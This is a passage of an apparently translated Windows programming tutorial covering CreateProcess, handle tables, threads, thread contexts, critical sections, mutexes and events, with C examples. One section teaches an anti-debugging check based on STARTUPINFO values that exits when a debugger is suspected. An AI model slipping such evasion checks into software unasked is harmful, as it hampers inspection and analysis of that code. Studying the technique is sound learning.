We met the Win32 message box above under the name MessageBox; in essence it is really MessageBoxW and MessageBoxA. MessageBoxA accepts only ASCII-encoded arguments, while MessageBoxW accepts only Unicode-encoded ones.

At heart, Windows strings are all wide characters, so calling MessageBoxW performs better: when you call MessageBoxA, the strings are converted to Unicode on the way down to the kernel (the lower layers of the system), so it is relatively slower.

The calls look like this:

CHAR strTitle[] = "Title";
CHAR strContent[] = "Hello World!";
MessageBoxA(0, strContent, strTitle, MB_OK);

WCHAR strTitle[] = L"Title";
WCHAR strContent[] = L"Hello World!";
MessageBoxW(0, strContent, strTitle, MB_OK);

TCHAR strTitle[] = TEXT("Title");
TCHAR strContent[] = TEXT("Hello World!");
MessageBox(0, strContent, strTitle, MB_OK);
5 How a Process Is Created

5.1 What is a process?

The resources a program needs (data, code, ...) are supplied by its process. A process is a spatial concept: its responsibility is to provide resources; how those resources are used is not its concern.

Every process has its own 4 GB virtual address space, the range 0x0 to 0xFFFFFFFF. That space is partitioned: the kernel portion (the high 2 GB) is the same copy for every process, while the other partitions (the low 2 GB) are private to the process, and only the user-mode area is the part we use directly.

A process can also be understood as a collection of modules. Open a process in OllyDbg and you will see many of them; each module is an executable file, and they all follow the same format, the PE format, so a process can also be understood as a bundle of PEs.
5.2 Creating a process

Every process is created by some other process. When we double-click a file in Windows, it is the explorer.exe process that creates the process for the file we opened, and the method it uses is CreateProcess().

The creation sequence, i.e. what CreateProcess does, is:

1. Map the EXE file (low 2 GB)
2. Create the kernel object EPROCESS (high 2 GB)
3. Map the system DLL (ntdll.dll)
4. Create the thread kernel object ETHREAD (high 2 GB)
5. The system starts the thread:
   a. Map the remaining DLLs (ntdll.LdrInitializeThunk)
   b. The thread begins executing

That is the creation sequence when opening A.exe. A process is a spatial concept that only supplies code, data, and other resources; what actually uses those resources is a thread, and every process needs at least one thread.
6 Creating a Process

The function that creates processes is CreateProcess(); it is used as follows:

BOOL CreateProcess(
    LPCTSTR lpApplicationName,                 // name of executable module: full path of the program to start
    LPTSTR lpCommandLine,                      // command line string: the command-line arguments
    LPSECURITY_ATTRIBUTES lpProcessAttributes, // SD: process security attributes
    LPSECURITY_ATTRIBUTES lpThreadAttributes,  // SD: thread security attributes
    BOOL bInheritHandles,                      // handle inheritance option
    DWORD dwCreationFlags,                     // creation flags
    LPVOID lpEnvironment,                      // new environment block: the parent's environment variables
    LPCTSTR lpCurrentDirectory,                // current directory name: sets the child's working directory (defaults to the parent's)
    LPSTARTUPINFO lpStartupInfo,               // startup information (structure with process-startup details)
    LPPROCESS_INFORMATION lpProcessInformation // process information (structure: process ID, thread ID, process handle, thread handle)
);

For this chapter we only need the first two parameters and the last two. The first two are lpApplicationName and lpCommandLine: the file path of the process to start, and its command-line arguments, which you pass if the program you are starting takes any.

Command-line arguments are what you supply when running a program at the CMD prompt; think of our main entry point:

int main(int argc, char* argv[])
{
    printf("%s - %s", argv[0], argv[1]);
    return 0;
}

The char* argv[] parameter is the command line: argv[0] is the program itself, and the entries after it, argv[1], argv[2], and so on, are the arguments.

So when creating a process with CreateProcess, if we need to supply command-line arguments we fill in the second parameter, lpCommandLine:
#include <windows.h>
#include <stdlib.h>

int main(int argc, char* argv[])
{
    TCHAR childProcessName[] = TEXT("C:/WINDOWS/system32/cmd.exe");
    TCHAR childProcessCommandLine[] = TEXT(" /c ping 127.0.0.1");

    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));

    si.cb = sizeof(si);

    if (CreateProcess(childProcessName, childProcessCommandLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        printf("CreateProcess Successfully! \n");
    } else {
        printf("CreateProcess Error: %d \n", GetLastError());
    }

    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);

    system("pause");
    return 0;
}

In the code above, we first define the child process path and its command-line arguments, then declare the si and pi structures and zero them with ZeroMemory. Next we set si.cb to the structure's size (why is this needed? Windows has many versions, and the size field keeps the structure usable across future updates). Finally CreateProcess creates the process; since it returns a BOOL we test it with if, and on failure we call GetLastError for the error number. What each number means is documented, for example at https://baike.baidu.com/item/GetLastError/4278820?fr=aladdin
After creating the process we eventually need to close it again, and since every process has at least one thread, we close both handles, using CloseHandle.
6.1 Extra: anti-debugging with the STARTUPINFO structure

CreateProcess() takes a STARTUPINFO structure parameter describing how the process starts. We normally fill it with zeros using ZeroMemory() first; but at run time, are all its members still zero? In particular, are they all still zero when the program is loaded in a debugger?

First, the members of STARTUPINFO:

typedef struct _STARTUPINFOA {
    DWORD cb;
    LPSTR lpReserved;
    LPSTR lpDesktop;
    LPSTR lpTitle;
    DWORD dwX;
    DWORD dwY;
    DWORD dwXSize;
    DWORD dwYSize;
    DWORD dwXCountChars;
    DWORD dwYCountChars;
    DWORD dwFillAttribute;
    DWORD dwFlags;
    WORD wShowWindow;
    WORD cbReserved2;
    LPBYTE lpReserved2;
    HANDLE hStdInput;
    HANDLE hStdOutput;
    HANDLE hStdError;
} STARTUPINFOA, *LPSTARTUPINFOA;
Let's print the DWORD members, retrieving them with GetStartupInfo:

#include "stdafx.h"
#include <windows.h>
#include <stdlib.h>

int main(int argc, char* argv[])
{
    STARTUPINFO si;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);

    GetStartupInfo(&si);

    printf("%d %d %d %d %d %d %d %d\n", si.dwX, si.dwY, si.dwXSize, si.dwYSize, si.dwXCountChars, si.dwYCountChars, si.dwFillAttribute, si.dwFlags);
    system("pause");
    return 0;
}

Run it normally (P1) and then under the DTDebug debugger (P2), and compare: several values clearly change when opened from the debugger: si.dwXSize, si.dwYSize, si.dwXCountChars, si.dwFillAttribute, si.dwFlags.

So we can test these values to detect a debugger:
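The course showed the check itself only as a screenshot; a minimal sketch of the idea follows (my own illustration; exactly which members to trust is a design choice, and dwFlags in particular can be nonzero for some perfectly normal launches, so it is left out here):

#include <windows.h>
#include <stdio.h>

int main()
{
    STARTUPINFO si;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    GetStartupInfo(&si);

    // In the experiment above these members stayed 0 on a normal launch;
    // a debugger that fills them in gives itself away.
    if (si.dwXSize || si.dwYSize || si.dwXCountChars || si.dwFillAttribute) {
        printf("Debugger suspected, exiting.\n");
        return 1;
    }
    printf("Looks clean, continuing.\n");
    return 0;
}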
7 The Handle Table

In the previous chapter we saw that CreateProcess() fills in an LPPROCESS_INFORMATION lpProcessInformation structure containing the process and thread IDs and handles. So what is an ID, and what is a handle?

7.1 Kernel objects

7.1.1 What is a kernel object?

First, kernel objects, which we will be dealing with constantly from now on. Processes, threads, files, mutexes, events, and so on each have a corresponding structure in the kernel, and those structures are all managed by the kernel, so we call them kernel objects. (When we create a process, an EPROCESS structure is created in the kernel half, the high 2 GB, of the address space...)

You do not have to memorize the list: search MSDN Library for CloseHandle, the function used to close handles. Never mind how it works for now; everything it supports closing is a kernel object.

7.1.2 Managing kernel objects

When we call the creation functions shown above, a structure is created in kernel space. How do we manage, or use, those structures? The obvious idea is to manage them through the kernel structure's address, but that has a problem: user-mode code could easily mishandle and corrupt a kernel structure's address. As we know from writing user-mode code, touching a nonexistent memory address just raises an error; but a bad access to a kernel address blue-screens Windows outright.

To prevent that, Microsoft never exposes kernel structure addresses to user mode, which means direct management of this kind is impossible.
7.2 The process handle table

Since kernel objects cannot be managed directly, the handle table was born. Note that only processes have handle tables, and every process has one.

A handle is essentially a firewall separating the user layer from the kernel layer: through a handle you can control the process's kernel structures, and the so-called handle value we receive is really just an index into the handle table.

7.3 Sharing one kernel object between processes

Suppose process A creates a kernel object with CreateProcess, and process B uses OpenProcess to open a process someone else created, i.e. to operate on its kernel object. Process A manipulates the kernel object through the corresponding handle (index) in its own handle table; process B manipulates the same kernel object through a handle (index) in its own table. (Note: the handle table is private; a handle value is an index into the owning process's own table.)

In the earlier examples we said CloseHandle is used to close processes and threads; really it releases a handle, which does not mean the kernel object immediately disappears. The kernel object carries a counter, here 2, reflecting how many references were taken. If only process A calls CloseHandle, the kernel object does not vanish, because process B is still using it; only when process B also calls CloseHandle does the counter reach 0 and the object is closed and destroyed.

Finally, note that everything above applies to all kernel objects except threads. Creating a process also creates a thread; to shut the thread down, CloseHandle must first bring its counter to 0, and then something must actually terminate it. So if we create an IE process that opens a website and merely call CloseHandle in our code, the browser does not close; we still have to click the window's close button ourselves (only once the thread has ended does the process end).
7.4 Can a handle be inherited?

Besides the sharing method above, Windows designed another way to share kernel objects. First let's look at whether a handle can be inherited at all.

A handle table actually has three columns: the handle value, the kernel structure's address, and whether the handle can be inherited. Say process A (the parent) creates four kernel objects; each of the four creation functions takes an LPSECURITY_ATTRIBUTES lpThreadAttributes parameter, and the presence of this parameter is how we can tell a function creates a kernel object.

Follow that parameter and you find it is just a structure with three members: (1) the structure's length; (2) a security descriptor; (3) whether the handle is inheritable.

The first member is business as usual; Windows structures routinely carry one. The second, the security descriptor, means little to us in practice: leave it empty and it follows the parent's by default; its role is to record who created the object and who has permission to access and use it.

The third member is the one to focus on, because it decides whether the handle can be inherited. For example, we can make the process and thread handles created by CreateProcess inheritable:
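The original showed this as a screenshot; a minimal sketch of what it set up (my own reconstruction, reusing the si/pi and child-process variables from the chapter 6 example):

SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = NULL;  // default: follow the parent's security
sa.bInheritHandle = TRUE;        // the handle *can* be inherited

// pass it as both the process and thread attributes
CreateProcess(childProcessName, childProcessCommandLine,
              &sa, &sa, FALSE, 0, NULL, NULL, &si, &pi);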
7.5 Is the handle allowed to be inherited?

We can make a handle inheritable, but that alone is only "can". For inheritance to actually happen, in other words for the child process to be allowed to inherit the parent's handles, one more parameter is needed.

Take CreateProcess again: its BOOL bInheritHandles parameter decides whether the child being created is allowed to inherit handles. Only when this parameter is TRUE is the child we create allowed to inherit the parent's handles.
8 Process-Related APIs

8.1 IDs and handles

If we successfully create a process, CreateProcess returns a structure with four pieces of data: the process ID, the process handle, the thread ID, and the thread handle.

The process ID is something we have seen long ago: it is usually called the PID, clearly visible in the process tab of Task Manager.

Every process has a private handle table, and the operating system has a handle table of its own, which we call the global handle table; it covers all running processes and threads.

A PID can be understood as an index into the global handle table, which makes the difference between a PID and a handle easy to see: a PID is global, meaningful and usable in any process, while a handle is local and private. A PID is unique; two live processes can never share one, although once a process disappears its PID may be given to another process. (A PID is not a handle, but through a PID you can obtain the corresponding handle in the global handle table.)

8.2 The TerminateProcess function

Let's put the concepts above to the test. First, process A opens Internet Explorer and records the new process's ID and handle.
Next, process B uses TerminateProcess to try to terminate it, first using the handle value obtained in process A. TerminateProcess is the function that terminates a process:

// the TerminateProcess function
BOOL TerminateProcess(
    HANDLE hProcess, // handle to the process
    UINT uExitCode   // exit code for the process
);
(See MSDN Library for the details of TerminateProcess.) Here we can see very clearly that terminating the process failed, and the error number means "invalid handle". That proves handles are private: another process cannot terminate the target using this handle value. To really close the process we have to obtain our own handle through the PID, as follows.

8.3 The OpenProcess function

Having understood TerminateProcess, to genuinely close a process we need the help of OpenProcess, which opens a process object:

HANDLE OpenProcess(
    DWORD dwDesiredAccess, // access flag: the access rights you want
    BOOL bInheritHandle,   // handle inheritance option: may the handle be inherited
    DWORD dwProcessId      // process identifier: the PID
);

In the code below, we open the process by PID (OpenProcess), asking for full access and no handle inheritance. Once OpenProcess completes we hold a handle of our own, and through that handle we can terminate the process:

HANDLE hProcess;
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 0x524);

if (!TerminateProcess(hProcess, 0)) {
    printf("Failed to terminate the process: %d \n", GetLastError());
}

8.4 Creating a process suspended

All of CreateProcess's parameters deserve a look; now we turn to the sixth, DWORD dwCreationFlags:

BOOL CreateProcess(
    LPCTSTR lpApplicationName,                 // name of executable module
    LPTSTR lpCommandLine,                      // command line string
    LPSECURITY_ATTRIBUTES lpProcessAttributes, // SD
    LPSECURITY_ATTRIBUTES lpThreadAttributes,  // SD
    BOOL bInheritHandles,                      // handle inheritance option
    DWORD dwCreationFlags,                     // creation flags <-- this parameter
    LPVOID lpEnvironment,                      // new environment block
    LPCTSTR lpCurrentDirectory,                // current directory name
    LPSTARTUPINFO lpStartupInfo,               // startup information
    LPPROCESS_INFORMATION lpProcessInformation // process information
);

When we create a console child process the default way, the child and the parent end up in the same command-line console. If we want them separated, dwCreationFlags is the tool: set it to CREATE_NEW_CONSOLE.
But CREATE_NEW_CONSOLE is not the value that matters most here, or rather not the truly meaningful one. The meaningful value is CREATE_SUSPENDED, which creates the process suspended.

When a process is created suspended, the creation sequence changes, and that demonstrates one thing: what gets suspended is essentially the thread; the process itself is still created. Consequently, if you want to resume it, you also resume the thread:
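The course showed this with screenshots; a minimal sketch of the idea (my own illustration, reusing the si/pi and child-process variables from the chapter 6 example):

// the child is created, but its main thread starts frozen
CreateProcess(childProcessName, childProcessCommandLine,
              NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

// ... do whatever preparation is needed while the child is frozen ...

ResumeThread(pi.hThread);  // resuming the thread is what un-suspends the process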
8.5 Module directory and working directory

GetModuleFileName and GetCurrentDirectory retrieve the current module directory and the current working directory respectively:

char strModule[256];
GetModuleFileName(NULL, strModule, 256); // module directory: the running exe's path, including the exe file name

char strWork[1000];
GetCurrentDirectory(1000, strWork); // get the current working directory

printf("Module directory: %s \nWorking directory: %s \n", strModule, strWork);

Note that the working directory can be changed: when creating a process with CreateProcess we can set the child's working directory through the eighth parameter, LPCTSTR lpCurrentDirectory.

Suppose we have this requirement: open the file 1.txt in the current working directory. With CreateProcess we can change the working path so the child reads the file from a working directory we specify:
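A minimal sketch of that call (my own illustration; the child program and directory names are hypothetical, and si/pi are set up as in the chapter 6 example):

// the child resolves relative paths such as "1.txt" against C:/Test
CreateProcess(TEXT("C:/Tools/ReadTxt.exe"), NULL,
              NULL, NULL, FALSE, 0, NULL,
              TEXT("C:/Test"),   // lpCurrentDirectory: the child's working directory
              &si, &pi);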
8.6 Other process-related APIs

Get the current process ID (PID): GetCurrentProcessId
Get the current process handle: GetCurrentProcess
Get the command line: GetCommandLine
Get the startup information: GetStartupInfo
Enumerate process IDs: EnumProcesses
Snapshots: CreateToolhelp32Snapshot (a small snapshot-based enumeration sketch follows below)
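A minimal sketch (my own illustration, not from the course) that walks the process list with a toolhelp snapshot:

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

int main()
{
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnap == INVALID_HANDLE_VALUE) return 1;

    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(pe);          // the usual Windows size field

    if (Process32First(hSnap, &pe)) {
        do {
            printf("PID %5lu  %s\n", pe.th32ProcessID, pe.szExeFile);
        } while (Process32Next(hSnap, &pe));
    }
    CloseHandle(hSnap);
    return 0;
}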
9 Creating Threads

9.1 What is a thread?

1. A thread is an execution entity attached to a process: a flow of executing code;
2. A process can contain multiple threads (and must contain at least one: a process is a spatial concept, a thread a temporal one).

Windows Task Manager clearly shows each process's current thread count. Having several threads means several pieces of code are executing, though not necessarily at the same time: on a single-core CPU there is no true multithreading; threads execute in time order, but the CPU switches so quickly that it feels no different from a multicore CPU.

9.2 Creating a thread

Threads are created with CreateThread, whose format is:

HANDLE CreateThread( // the return value is the thread handle
    LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD: security attributes, including the security descriptor
    SIZE_T dwStackSize,                       // initial stack size
    LPTHREAD_START_ROUTINE lpStartAddress,    // thread function: the code the thread executes
    LPVOID lpParameter,                       // thread argument: the parameter the thread needs
    DWORD dwCreationFlags,                    // creation option: flags; a thread can also be created suspended
    LPDWORD lpThreadId                        // thread identifier: receives the new thread's ID
);

The thread function must follow a required signature, shown below.
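The original presented the requirement as a screenshot; as the course's own examples below show, the required prototype is:

DWORD WINAPI ThreadProc(LPVOID lpParameter);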
Let's try creating a thread that runs a for loop:

#include <windows.h>

// the thread function's signature is constrained; see MSDN Library
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    // the code to execute
    for (int i = 0; i < 100; i++) {
        Sleep(500);
        printf("++++++ %d \n", i);
    }

    return 0;
}

int main(int argc, char* argv[])
{
    // create the thread
    CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);

    // the code to execute
    for (int i = 0; i < 100; i++) {
        Sleep(500);
        printf("------ %d \n", i);
    }
    return 0;
}

The threads do not coordinate with each other; each simply runs its own code. Making them cooperate requires thread communication, which we will study later.

9.3 Passing arguments to a thread function

To pass an argument to a thread, suppose we want to make the number of loop iterations configurable and pass n in. Note that the argument handed to the thread lives on the stack, and it must be cast when passed:
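The accompanying screenshot is missing; a minimal sketch of what it described (my own reconstruction: pass n by address with an LPVOID cast, cast it back inside the thread):

#include <windows.h>
#include <stdio.h>

DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    int n = *(int*)lpParameter;  // cast the LPVOID back to what was passed
    for (int i = 0; i < n; i++) {
        Sleep(500);
        printf("++++++ %d \n", i);
    }
    return 0;
}

int main(int argc, char* argv[])
{
    int n = 10;                  // lives on main's stack
    HANDLE hThread = CreateThread(NULL, NULL, ThreadProc, (LPVOID)&n, 0, NULL);
    // keep main (and therefore n) alive while the thread still uses it
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    return 0;
}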
To guarantee the argument's lifetime, we can also place the argument in the global variable area:
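A minimal sketch of that variant (my own illustration; only the pieces that change from the previous sketch are shown):

int g_n = 10;  // global data area: lives for the whole program, so no lifetime worry

DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    for (int i = 0; i < g_n; i++) {
        Sleep(500);
        printf("++++++ %d \n", i);
    }
    return 0;
}

// in main: CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL); no pointer needed now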
10 Controlling Threads

10.1 Making a thread stop

10.1.1 The Sleep function

Sleep delays execution at the point of the call for the given number of milliseconds before continuing, for example:

for (int i = 0; i < 100; i++) {
    Sleep(500);
    printf("------ %d \n", i);
}

10.1.2 The SuspendThread function

SuspendThread pauses (suspends) a thread; while suspended, the thread consumes no CPU. Its format is simple, taking just a thread handle:

DWORD SuspendThread(
    HANDLE hThread // handle to thread
);

10.1.3 The ResumeThread function

ResumeThread resumes a paused (suspended) thread; its format is equally simple, taking just a thread handle:

DWORD ResumeThread(
    HANDLE hThread // handle to thread
);

Note that a thread must be resumed as many times as it was suspended:

SuspendThread(hThread);
SuspendThread(hThread);

ResumeThread(hThread);
ResumeThread(hThread);
10.2 Waiting for a thread to finish

10.2.1 The WaitForSingleObject function

WaitForSingleObject waits for a kernel object's state to change, which for a thread means waiting until it has finished executing, before continuing past the call:

DWORD WaitForSingleObject(
    HANDLE hHandle,      // handle to object
    DWORD dwMilliseconds // time-out interval (milliseconds)
);

If you want to wait indefinitely, pass INFINITE as the second parameter:

HANDLE hThread;
hThread = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
printf("OK...");

10.2.2 The WaitForMultipleObjects function

WaitForMultipleObjects does the same thing as WaitForSingleObject, except it can wait for several kernel objects' states to change:

DWORD WaitForMultipleObjects(
    DWORD nCount,            // number of handles in array: how many kernel objects
    CONST HANDLE *lpHandles, // object-handle array
    BOOL bWaitAll,           // wait option: the wait mode
    DWORD dwMilliseconds     // time-out interval (milliseconds)
);
The wait mode is a BOOL: TRUE waits for all of the objects' states to change; FALSE waits for any one of them:

HANDLE hThread[2];
hThread[0] = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
hThread[1] = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
WaitForMultipleObjects(2, hThread, TRUE, INFINITE);

10.2.3 The GetExitCodeThread function

A thread function has a DWORD return value, which you can return as your design requires. How do we read that result? With GetExitCodeThread:

BOOL GetExitCodeThread(
    HANDLE hThread,    // handle to the thread
    LPDWORD lpExitCode // termination status
);

Per MSDN Library, the parameters are the thread handle and an out parameter, which can be understood as GetExitCodeThread's result:

HANDLE hThread;
hThread = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);

WaitForSingleObject(hThread, INFINITE);

DWORD exitCode;
GetExitCodeThread(hThread, &exitCode);

printf("Exit Code: %d \n", exitCode);
Note that this function should be used together with the two wait functions above; otherwise the value you read will not be the thread function's return value.

10.3 Getting and setting the thread context

The thread context is the contents of the CPU registers and program counter at a point in time. To get or set a thread's context, the thread must first be suspended.

10.3.1 The GetThreadContext function

GetThreadContext retrieves the thread context:

BOOL GetThreadContext(
    HANDLE hThread,     // handle to thread with context: the handle
    LPCONTEXT lpContext // context structure
);
The first parameter is the thread handle, which is straightforward; the important one is the second, a CONTEXT structure holding the specified thread's context, whose ContextFlags member selects which parts of the context to operate on.

Setting the CONTEXT structure's ContextFlags member to CONTEXT_INTEGER selects the integer registers: edi, esi, ebx, edx, ecx, eax. The following code reads them:

HANDLE hThread;
hThread = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);

SuspendThread(hThread);

CONTEXT c;
c.ContextFlags = CONTEXT_INTEGER;
GetThreadContext(hThread, &c);

printf("%x %x \n", c.Eax, c.Ecx);
10.3.2 The SetThreadContext function

SetThreadContext sets, i.e. modifies, the thread context:

BOOL SetThreadContext(
    HANDLE hThread,          // handle to thread
    CONST CONTEXT *lpContext // context structure
);

We can try modifying Eax and then reading it back:

HANDLE hThread;
hThread = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);

SuspendThread(hThread);

CONTEXT c;
c.ContextFlags = CONTEXT_INTEGER;
c.Eax = 0x123;
// (safer in practice: call GetThreadContext first, change Eax, then set,
//  so the other integer registers are not overwritten with stack garbage)
SetThreadContext(hThread, &c);

CONTEXT c1;
c1.ContextFlags = CONTEXT_INTEGER;
GetThreadContext(hThread, &c1);

printf("%x \n", c1.Eax);
11 Critical Sections

11.1 Thread-safety problems

Every thread has its own stack, and local variables are stored on the stack, which means every thread gets its own copy of its "local variables". A thread that only uses its own locals has no thread-safety problem. But what if multiple threads share one global variable? When does that go wrong? When multiple threads share a global and modify it, there is a safety problem; if they only read it, there is none.

In the code below, the thread function uses a global variable to simulate selling an item. The global countNumber is the item's total stock, initially 10; if several places (threads) sell (use) the item (global) at once, mistakes happen:

#include <windows.h>

int countNumber = 10;

DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    while (countNumber > 0) {
        printf("Sell num: %d\n", countNumber);
        // one sold
        countNumber--;
        printf("Count: %d\n", countNumber);
    }
    return 0;
}

int main(int argc, char* argv[])
{
    HANDLE hThread;
    hThread = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);

    HANDLE hThread1;
    hThread1 = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);

    CloseHandle(hThread);

    getchar();
    return 0;
}

Run the code and you will see items sold twice, and in the end the total even becomes -1.
What is the root cause? The threads execute concurrently, interleaving rather than taking turns in order, so they trip over each other, and this outcome follows naturally.

11.1.1 Solving it

Solving thread safety introduces a concept: a critical resource is a resource that only one thread may access at a time, and the stretch of code that accesses a critical resource is called a critical section.

How do we build a critical section? First, we could write one ourselves, but that has a real barrier to entry, so let's not dig into it yet; second, we can use the API Windows provides.

11.2 How a critical section works

First there is a token. Suppose thread 1 takes it: the token now belongs to thread 1 alone. Thread 1 runs its code and accesses the global variable, and finally returns the token. If another thread wants to access the global, it must first take the token, and while the token is gone it cannot.

If you implemented this yourself, the very check "has the token been taken?" can go wrong in the same way, which is why rolling your own critical section has a real barrier to entry.
11.3 Thread locks

A thread lock is the implementation of a critical section, and with it we can solve the problem above completely. The steps:

1. Create a global variable: CRITICAL_SECTION cs;
2. Initialize it: InitializeCriticalSection(&cs);
3. Build the critical section: enter with EnterCriticalSection(&cs); leave with LeaveCriticalSection(&cs);

We can rewrite the earlier selling code this way: build and enter the critical section before using the global variable, and leave it when done:

#include <windows.h>

CRITICAL_SECTION cs; // create the global variable
int countNumber = 10;

DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    while (1) {
        EnterCriticalSection(&cs); // enter the critical section: take the token
        if (countNumber > 0) {
            printf("Thread: %d\n", *((int*)lpParameter));
            printf("Sell num: %d\n", countNumber);
            // one sold
            countNumber--;
            printf("Count: %d\n", countNumber);
        } else {
            LeaveCriticalSection(&cs); // leave the critical section: return the token
            break;
        }
        LeaveCriticalSection(&cs); // leave the critical section: return the token
    }

    return 0;
}

int main(int argc, char* argv[])
{
    InitializeCriticalSection(&cs); // initialize before use

    int a = 1;
    HANDLE hThread;
    hThread = CreateThread(NULL, NULL, ThreadProc, (LPVOID)&a, 0, NULL);

    int b = 2;
    HANDLE hThread1;
    hThread1 = CreateThread(NULL, NULL, ThreadProc, (LPVOID)&b, 0, NULL);

    CloseHandle(hThread);

    getchar();
    return 0;
}
12 Mutexes
12.1 What About Kernel-Level Critical Resources?
In the previous chapter we used a thread lock to solve the thread-safety problem of multiple threads sharing one global variable. Now suppose thread B of process A and thread D of process C use the same kernel-level critical resource (a kernel object: a thread, file, process, ...). How do we make that access safe? A thread lock clearly cannot do it, because a thread lock only controls threads within one process.
What we need is a token that lives in the kernel; the object that provides it is called a mutex.
12.1.1 Using a Mutex
The function for creating a mutex is CreateMutex. Its signature is:
HANDLE CreateMutex(
    LPSECURITY_ATTRIBUTES lpMutexAttributes, // SD: security attributes, contains the security descriptor
    BOOL bInitialOwner,                      // initial owner: pass FALSE if you want the mutex to be signaled (usable) right after creation; officially, TRUE means the calling process owns the mutex
    LPCTSTR lpName                           // object name: the mutex's name
);
We can simulate operating on a resource after creating the mutex, and run two instances of the program to see the mutex at work:
#include <windows.h>
#include <stdio.h>

int main(int argc, char* argv[])
{
    // create the mutex
    HANDLE cm = CreateMutex(NULL, FALSE, "XYZ");
    // wait for the mutex to change state (become signaled / owned), i.e. take the token
    WaitForSingleObject(cm, INFINITE);

    // operate on the resource
    for (int i = 0; i < 5; i++) {
        printf("Process: A Thread: B -- %d \n", i);
        Sleep(1000);
    }
    // release the token
    ReleaseMutex(cm);
    return 0;
}
12.2 Differences Between a Mutex and a Thread Lock
1. A thread lock can only control threads within a single process.
2. A mutex can wait with a timeout; a thread lock cannot (see the sketch below).
3. When a thread dies unexpectedly, a mutex avoids an infinite wait.
4. A mutex is less efficient than a thread lock.
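To illustrate point 2, a minimal sketch of a timed wait, assuming a mutex named "XYZ" already exists (my own illustration, not course code):
#include <windows.h>
#include <stdio.h>

int main(int argc, char* argv[])
{
    // open the existing mutex created elsewhere (assumption: name "XYZ")
    HANDLE cm = OpenMutex(MUTEX_ALL_ACCESS, FALSE, "XYZ");
    if (cm == NULL) return 0;

    // wait at most 3 seconds instead of INFINITE
    DWORD dwRet = WaitForSingleObject(cm, 3000);
    if (dwRet == WAIT_OBJECT_0) {
        // got the token: operate on the resource, then return the token
        ReleaseMutex(cm);
    } else if (dwRet == WAIT_TIMEOUT) {
        printf("timed out waiting for the mutex\n");
    }
    CloseHandle(cm);
    return 0;
}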
12.3 Extra: Using a Mutex to Prevent Multiple Instances
MSDN Library describes CreateMutex's return value like this: if the function succeeds, the return value is a handle to the mutex object; if the named mutex already existed before the call, the function returns a handle to the existing object and GetLastError returns ERROR_ALREADY_EXISTS (the mutex already exists); otherwise the caller creates the mutex. If the function fails, the return value is NULL; call GetLastError for extended error information.
So we can use a mutex to prevent a program from being opened more than once:
#include <windows.h>
#include <stdio.h>

int main(int argc, char* argv[])
{
    // create the mutex
    HANDLE cm = CreateMutex(NULL, TRUE, "XYZ");
    // check whether creation failed
    if (cm != NULL) {
        // check whether the mutex already exists; if so, the program is already running
        if (GetLastError() == ERROR_ALREADY_EXISTS) {
            printf("This program is already running, do not start it again!");
            getchar();
        } else {
            // wait for the mutex to become signaled / owned, i.e. take the token
            WaitForSingleObject(cm, INFINITE);
            // operate on the resource
            for (int i = 0; i < 5; i++) {
                printf("Process: A Thread: B -- %d \n", i);
                Sleep(1000);
            }
            // release the token
            ReleaseMutex(cm);
        }
    } else {
        printf("CreateMutex failed! error code: %d\n", GetLastError());
    }

    return 0;
}
13 Events
An event is itself a kernel object, and it too is used to control threads.
13.1 Notification Type
An event can be used as a notification. Events are created with CreateEvent, whose signature is:
HANDLE CreateEvent(
    LPSECURITY_ATTRIBUTES lpEventAttributes, // SD: security attributes, contains the security descriptor
    BOOL bManualReset,                       // reset type: TRUE if you want a notification (manual-reset) event, FALSE otherwise
    BOOL bInitialState,                      // initial state: whether the event is signaled when created; TRUE for signaled
    LPCTSTR lpName                           // object name: the event's name
);
So what exactly is the notification type? We can write some code to find out:
As the figure below shows, when we run the code both threads execute. With the mutex used earlier, thread A would run first and thread B would wait until thread A returned the token (finished running). Here we put getchar() at the end of each thread function to keep the threads from finishing, yet both still ran:
#include <windows.h>
#include <stdio.h>

HANDLE e_event;

DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    // wait for the event
    WaitForSingleObject(e_event, INFINITE);
    printf("ThreadProc - running ...\n");
    getchar();
    return 0;
}

DWORD WINAPI ThreadProcB(LPVOID lpParameter) {
    // wait for the event
    WaitForSingleObject(e_event, INFINITE);
    printf("ThreadProcB - running ...\n");
    getchar();
    return 0;
}

int main(int argc, char* argv[])
{

    // create the event
    // 2nd parameter: FALSE means non-notification, i.e. mutual exclusion; TRUE means notification type
    // 3rd parameter: initially non-signaled
    e_event = CreateEvent(NULL, TRUE, FALSE, NULL);

    // create 2 threads
    HANDLE hThread[2];
    hThread[0] = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
    hThread[1] = CreateThread(NULL, NULL, ThreadProcB, NULL, 0, NULL);

    // set the event to signaled
    SetEvent(e_event);

    // wait for the threads to finish, then destroy the kernel objects
    WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
